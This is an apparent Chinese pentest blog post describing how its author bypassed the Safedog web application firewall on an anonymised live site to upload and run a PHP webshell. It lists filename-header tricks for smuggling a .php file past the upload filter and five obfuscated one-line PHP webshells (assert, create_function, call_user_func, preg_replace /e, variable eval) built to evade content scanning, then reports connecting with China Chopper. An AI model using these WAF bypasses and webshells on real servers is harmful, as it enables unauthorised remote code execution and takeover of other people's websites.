实战文件上传绕过某狗getshell

Delina

原文链接：实战文件上传绕过某狗getshell
​
前言：
目标站点有安全狗，对于上传的文件自动修改文件名，但不修改后缀。
此文章只在moonsec公众号进行发布，仅供学习。
过程：
对于目标站，www.xxx.com，看了一番，没有什么收获（静态页面）。看了只能从别的程序入手了。
www.xxx.com
aaa.xxx.com
这两个是两个完全不同的程序（子域名），也可以是端口，子目录。
通过搜索引擎，找到到了一个上传文件的地方，语法如下
site:xxx.com上传
进去看看

​

​

可以，可以。搜索引擎还是很强的呀。这里没有验证码，还是挺好的。打开burp，先抓个包试试水。
先正常走一遍，发现把图片给重命名了。
​
​
把后缀改一下，发现有狗，但还是很开心的呀，说明此次上传对网站造成了危害，也就是后端代码没有对我们的php文件进行过滤，而且拦我们的还是安全狗这种不怎么厉害的waf。这里我总结出几种常见绕过方法

1.文件名换行绕过
filename="moonsec.ph
p"

2.双写等于号绕过
filename=="moonsec.php"

3.=；绕过
filename=；"moonsec.php"

4.垃圾字符绕过
filename="11111111111111111111111111moonsec.php"
（这些11是远远不够的，这里只是展示方便才写这么少的）

​

成功绕过安全狗，上传php文件，看样子是被解析了
​
写入一句话木马，上传成功了，可是访问却被安全狗给拦了
​

​

​

原因可能是安全狗对于文件内容，进行了检测。不怕，我还是给咱们总结了绕过方法

1. 1.assert函数
   
2. <?phpassert(@$_POST['moonsec']); ?>
   
3. 
   
4. 2.create_function函数
   
5. <?php
   
6. $fun= create_function('',$_POST['moonsec']);
   
7. $fun();
   
8. ?>
   
9. 
   
10. 3.call_user_func回调函数
    
11. <?php
    
12. @call_user_func(assert,$_POST['moonsec']);
    
13. ?>
    
14. 
    
15. 4.preg_replace函数
    
16. <?php
    
17. @preg_replace("/abcde/e",$_POST['moonsec'], "abcdefg");
    
18. ?>
    
19. 
    
20. 5.变量函数
    
21. <?php
    
22. $a= "eval";
    
23. $a(@$_POST['moonsec']);
    
24. ?>

复制代码

​

​

成功连接

​

​

总结：
还是很幸运的一次测试，就是有个工具的小坑：
在用getshel管理工具的时候，我用蚁剑就连接不上，后来用了菜刀就成功连接了
​